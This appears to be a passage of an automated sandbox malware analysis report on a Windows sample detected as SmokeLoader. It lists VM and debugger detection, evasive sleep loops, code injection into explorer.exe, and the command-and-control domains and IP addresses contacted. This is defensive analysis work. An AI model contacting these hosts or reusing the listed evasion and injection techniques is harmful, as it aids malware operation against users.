Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\eveggtb Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\eveggtb Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\eveggtb Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\eveggtb Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\eveggtb Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\eveggtb Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\411F.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\411F.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\411F.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\411F.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\411F.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\411F.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 6804 Thread sleep count: 602 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 5408 Thread sleep count: 386 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 5408 Thread sleep time: -38600s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 6648 Thread sleep count: 485 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 6648 Thread sleep time: -48500s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 1576 Thread sleep count: 482 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 6036 Thread sleep count: 398 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 6036 Thread sleep time: -39800s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 6292 Thread sleep count: 279 > 30 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\411F.exe Last function: Thread delayed
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 602 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 386 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 485 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 482 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 398 Jump to behavior
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 0_2_0041CA09 __wremove,__wrename,SetCurrentDirectoryW,EnterCriticalSection,GlobalAddAtomW,UnlockFile,WriteProfileStringA,GetFullPathNameA,FindNextVolumeMountPointA,GetCompressedFileSizeW,FillConsoleOutputCharacterA,SetNamedPipeHandleState,lstrcpynA,FatalAppExitA,GetConsoleAliasesLengthA,GetProcessTimes,ChangeTimerQueueTimer,SetWaitableTimer,VirtualLock,GetSystemPowerStatus,SignalObjectAndWait,WaitForMultipleObjectsEx,OpenMutexA,GetLastError,HeapValidate,GetComputerNameW,OpenMutexW,FreeEnvironmentStringsA,TlsAlloc,ClearCommBreak,GetConsoleScreenBufferInfo,OpenSemaphoreA,FreeEnvironmentStringsA,GetWriteWatch,DeleteTimerQueueTimer,GetDevicePowerState,ProcessIdToSessionId,EnumSystemLocalesW,GetSystemTimeAdjustment,SetCommState,LocalShrink,WriteConsoleInputW,GetConsoleAliasExesLengthW,FreeConsole,SearchPathW,FlushConsoleInputBuffer,GetVolumePathNameA,GetConsoleCP,MoveFileExA,LockFileEx,ReplaceFileA,lstrcpyA,SetFileShortNameA,GetThreadLocale,CreateSemaphoreA,TryEnterCriticalSection,FreeEnvironmentStringsA,CreateSemaphoreA,SetLocalTime,FindResourceExA,GetQueuedCompletionStatus,CreateSemaphoreA,GetNumberFormatW,PeekConsoleInputA,CreateIoCompletionPort,GetProcAddress,HeapUnlock,GetFileAttributesExW,GetPrivateProfileStructW,TryEnterCriticalSection,GetPrivateProfileStructA,WritePrivateProfileSectionW,GetPrivateProfileSectionW,SetSystemTimeAdjustment,InterlockedIncrement,WriteConsoleW,EndUpdateResourceA,DefineDosDeviceW,TryEnterCriticalSection,InterlockedExchange,SetFirmwareEnvironmentVariableA,CreateActCtxA,lstrcatW,WriteProfileStringA,TerminateThread,GetSystemWow64DirectoryA,GetConsoleMode,WriteFile,lstrcmpA,FindFirstFileA,DebugBreak,GetStringTypeA, 0_2_0041CA09
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 0_2_0041AA72 TryEnterCriticalSection,BuildCommDCBAndTimeoutsA,GetNamedPipeHandleStateA,ReleaseMutex,AddAtomA,TzSpecificLocalTimeToSystemTime,SetConsoleCursorInfo,VerifyVersionInfoW,TlsGetValue,CopyFileA,GetLongPathNameA,SetVolumeMountPointW,GetProcessPriorityBoost,FreeEnvironmentStringsA,VerifyVersionInfoA,FindFirstFileExA, 0_2_0041AA72
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe System information queried: ModuleInformation Jump to behavior
Source: explorer.exe, 00000005.00000000.692263832.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.688084068.0000000006650000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.692263832.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.695671128.000000000FCE0000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}.
Source: explorer.exe, 00000005.00000000.693313522.000000000A897000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}..
Source: explorer.exe, 00000005.00000000.693313522.000000000A897000.00000004.00000001.sdmp Binary or memory string: War&Prod_VMware_SATAb
Source: explorer.exe, 00000005.00000000.693313522.000000000A897000.00000004.00000001.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}$$
Source: explorer.exe, 00000005.00000000.687195483.0000000004710000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000005.00000000.726779211.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000005.00000000.726841267.000000000A783000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@

Anti Debugging:

barindex
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\eveggtb System information queried: CodeIntegrityInformation Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 0_2_00424E60 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00424E60
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 0_2_00433420 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00433420
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 0_2_0041C7DF GetTickCount,FreeUserPhysicalPages,GetCalendarInfoW,GetProfileStringA,SetLastError,GetSystemWow64DirectoryA,GetWindowsDirectoryW,GetCPInfoExW,GetDiskFreeSpaceExW,GetStartupInfoA,ReadConsoleOutputCharacterA,CreateNamedPipeW,GetProcessHeap,GetProcessHeap,GetPrivateProfileIntW,SetFileAttributesA, 0_2_0041C7DF
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 0_2_00845BDC push dword ptr fs:[00000030h] 0_2_00845BDC
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\eveggtb Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\411F.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 1_1_004027ED LdrLoadDll, 1_1_004027ED
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 0_2_00424E60 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00424E60
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 0_2_0042C6D0 SetUnhandledExceptionFilter, 0_2_0042C6D0
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 0_2_004283B0 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_004283B0

HIPS / PFW / Operating System Protection Evasion:

barindex
Benign windows process drops PE files
Source: C:\Windows\explorer.exe File created: 411F.exe.5.dr Jump to dropped file
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: unicupload.top
Source: C:\Windows\explorer.exe Network Connect: 185.233.81.115 187 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: host-data-coin-11.com
Source: C:\Windows\explorer.exe Domain query: infinity-cheats.com
Source: C:\Windows\explorer.exe Network Connect: 185.186.142.166 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: privacytools-foryou-777.com
Source: C:\Windows\explorer.exe Domain query: data-host-coin-8.com
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Source: C:\Users\user\AppData\Roaming\eveggtb Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\AppData\Roaming\eveggtb Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Thread created: C:\Windows\explorer.exe EIP: 4F41930 Jump to behavior
Source: C:\Users\user\AppData\Roaming\eveggtb Thread created: unknown EIP: 4F91930 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Process created: C:\Users\user\Desktop\UZ6FEqlix4.exe "C:\Users\user\Desktop\UZ6FEqlix4.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\eveggtb Process created: C:\Users\user\AppData\Roaming\eveggtb C:\Users\user\AppData\Roaming\eveggtb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\411F.exe Process created: C:\Users\user\AppData\Local\Temp\411F.exe C:\Users\user\AppData\Local\Temp\411F.exe Jump to behavior
Source: explorer.exe, 00000005.00000000.717104368.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.686588068.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.700174551.0000000000AD8000.00000004.00000020.sdmp Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000005.00000000.717509991.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.700728701.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.686741721.0000000001080000.00000002.00020000.sdmp, 411F.exe, 00000014.00000002.936067416.0000000000B80000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000005.00000000.717509991.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.721547751.0000000005E50000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.700728701.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.686741721.0000000001080000.00000002.00020000.sdmp, 411F.exe, 00000014.00000002.936067416.0000000000B80000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000000.717509991.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.700728701.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.686741721.0000000001080000.00000002.00020000.sdmp, 411F.exe, 00000014.00000002.936067416.0000000000B80000.00000002.00020000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000005.00000000.717509991.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.700728701.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.686741721.0000000001080000.00000002.00020000.sdmp, 411F.exe, 00000014.00000002.936067416.0000000000B80000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000005.00000000.692484311.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.711003387.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.726779211.000000000A716000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd5D

Language, Device and Operating System Detection:

barindex
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: __wremove,__wrename,SetCurrentDirectoryW,EnterCriticalSection,GlobalAddAtomW,UnlockFile,WriteProfileStringA,GetFullPathNameA,FindNextVolumeMountPointA,GetCompressedFileSizeW,FillConsoleOutputCharacterA,SetNamedPipeHandleState,lstrcpynA,FatalAppExitA,GetConsoleAliasesLengthA,GetProcessTimes,ChangeTimerQueueTimer,SetWaitableTimer,VirtualLock,GetSystemPowerStatus,SignalObjectAndWait,WaitForMultipleObjectsEx,OpenMutexA,GetLastError,HeapValidate,GetComputerNameW,OpenMutexW,FreeEnvironmentStringsA,TlsAlloc,ClearCommBreak,GetConsoleScreenBufferInfo,OpenSemaphoreA,FreeEnvironmentStringsA,GetWriteWatch,DeleteTimerQueueTimer,GetDevicePowerState,ProcessIdToSessionId,EnumSystemLocalesW,GetSystemTimeAdjustment,SetCommState,LocalShrink,WriteConsoleInputW,GetConsoleAliasExesLengthW,FreeConsole,SearchPathW,FlushConsoleInputBuffer,GetVolumePathNameA,GetConsoleCP,MoveFileExA,LockFileEx,ReplaceFileA,lstrcpyA,SetFileShortNameA,GetThreadLocale,CreateSemaphoreA,TryEnterCriticalSection,FreeEnvironmentStringsA,CreateSemaphoreA,SetLocalTime,FindResourceExA,GetQueuedCompletionStatus,CreateSemaphoreA,GetNumberFormatW,PeekConsoleInputA,CreateIoCompletionPort,GetProcAddress,HeapUnlock,GetFileAttributesExW,GetPrivateProfileStructW,TryEnterCriticalSection,GetPrivateProfileStructA,WritePrivateProfileSectionW,GetPrivateProfileSectionW,SetSystemTimeAdjustment,InterlockedIncrement,WriteConsoleW,EndUpdateResourceA,DefineDosDeviceW,TryEnterCriticalSection,InterlockedExchange,SetFirmwareEnvironmentVariableA,CreateActCtxA,lstrcatW,WriteProfileStringA,TerminateThread,GetSystemWow64DirectoryA,GetConsoleMode,WriteFile,lstrcmpA,FindFirstFileA,DebugBreak,GetStringTypeA, 0_2_0041CA09
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: __crtGetLocaleInfoA_stat,_LocaleUpdate::~_LocaleUpdate, 0_2_00434C50
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen, 0_2_00431810
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 0_2_0042D890
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: GetLocaleInfoW,_malloc,__MarkAllocaS,GetLocaleInfoW,WideCharToMultiByte,WideCharToMultiByte,__freea, 0_2_00434CA0
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: ___getlocaleinfo,GetCPInfo,___crtLCMapStringW,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,InterlockedDecrement, 0_2_004245C0
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: _LcidFromHexString,GetLocaleInfoA,__stricmp,_TestDefaultCountry, 0_2_004315D0
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: _strlen,EnumSystemLocalesA, 0_2_00431580
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA, 0_2_00430E60
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_fix_grouping,InterlockedDecrement,InterlockedDecrement, 0_2_0042EB40
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA, 0_2_00431360
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,___crtGetLocaleInfoA,_strncpy_s,__invoke_watson_if_error,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 0_2_0042C370
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: GetLocaleInfoW,GetACP,GetLocaleInfoW, 0_2_00431710
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_fix_grouping,InterlockedDecrement,InterlockedDecrement, 0_2_0042EF20
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: _GetLcidFromDefault,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,_GetLcidFromDefault,_ProcessCodePage,IsValidCodePage,IsValidLocale,_wcscpy_s,__invoke_watson_if_error,GetLocaleInfoA,GetLocaleInfoA,__itow_s, 0_2_00430B20
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: _LcidFromHexString,GetLocaleInfoA,__stricmp,GetLocaleInfoA,__stricmp,__strnicmp,_strlen,_TestDefaultCountry,GetLocaleInfoA,__stricmp,_strlen,_TestDefaultLanguage,__stricmp,_TestDefaultLanguage, 0_2_00430F20
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: _LcidFromHexString,GetLocaleInfoA,__stricmp,_TestDefaultLanguage,__stricmp,_TestDefaultLanguage, 0_2_004313E0
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 0_2_0041C7DF GetTickCount,FreeUserPhysicalPages,GetCalendarInfoW,GetProfileStringA,SetLastError,GetSystemWow64DirectoryA,GetWindowsDirectoryW,GetCPInfoExW,GetDiskFreeSpaceExW,GetStartupInfoA,ReadConsoleOutputCharacterA,CreateNamedPipeW,GetProcessHeap,GetProcessHeap,GetPrivateProfileIntW,SetFileAttributesA, 0_2_0041C7DF
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 0_2_0041CA09 __wremove,__wrename,SetCurrentDirectoryW,EnterCriticalSection,GlobalAddAtomW,UnlockFile,WriteProfileStringA,GetFullPathNameA,FindNextVolumeMountPointA,GetCompressedFileSizeW,FillConsoleOutputCharacterA,SetNamedPipeHandleState,lstrcpynA,FatalAppExitA,GetConsoleAliasesLengthA,GetProcessTimes,ChangeTimerQueueTimer,SetWaitableTimer,VirtualLock,GetSystemPowerStatus,SignalObjectAndWait,WaitForMultipleObjectsEx,OpenMutexA,GetLastError,HeapValidate,GetComputerNameW,OpenMutexW,FreeEnvironmentStringsA,TlsAlloc,ClearCommBreak,GetConsoleScreenBufferInfo,OpenSemaphoreA,FreeEnvironmentStringsA,GetWriteWatch,DeleteTimerQueueTimer,GetDevicePowerState,ProcessIdToSessionId,EnumSystemLocalesW,GetSystemTimeAdjustment,SetCommState,LocalShrink,WriteConsoleInputW,GetConsoleAliasExesLengthW,FreeConsole,SearchPathW,FlushConsoleInputBuffer,GetVolumePathNameA,GetConsoleCP,MoveFileExA,LockFileEx,ReplaceFileA,lstrcpyA,SetFileShortNameA,GetThreadLocale,CreateSemaphoreA,TryEnterCriticalSection,FreeEnvironmentStringsA,CreateSemaphoreA,SetLocalTime,FindResourceExA,GetQueuedCompletionStatus,CreateSemaphoreA,GetNumberFormatW,PeekConsoleInputA,CreateIoCompletionPort,GetProcAddress,HeapUnlock,GetFileAttributesExW,GetPrivateProfileStructW,TryEnterCriticalSection,GetPrivateProfileStructA,WritePrivateProfileSectionW,GetPrivateProfileSectionW,SetSystemTimeAdjustment,InterlockedIncrement,WriteConsoleW,EndUpdateResourceA,DefineDosDeviceW,TryEnterCriticalSection,InterlockedExchange,SetFirmwareEnvironmentVariableA,CreateActCtxA,lstrcatW,WriteProfileStringA,TerminateThread,GetSystemWow64DirectoryA,GetConsoleMode,WriteFile,lstrcmpA,FindFirstFileA,DebugBreak,GetStringTypeA, 0_2_0041CA09

Stealing of Sensitive Information:

barindex
Yara detected SmokeLoader
Source: Yara match File source: 00000001.00000002.733146103.0000000000540000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.781213827.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.733351124.0000000002051000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.720297741.0000000004F41000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.781100610.0000000000460000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected SmokeLoader
Source: Yara match File source: 00000001.00000002.733146103.0000000000540000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.781213827.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.733351124.0000000002051000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.720297741.0000000004F41000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.781100610.0000000000460000.00000004.00000001.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
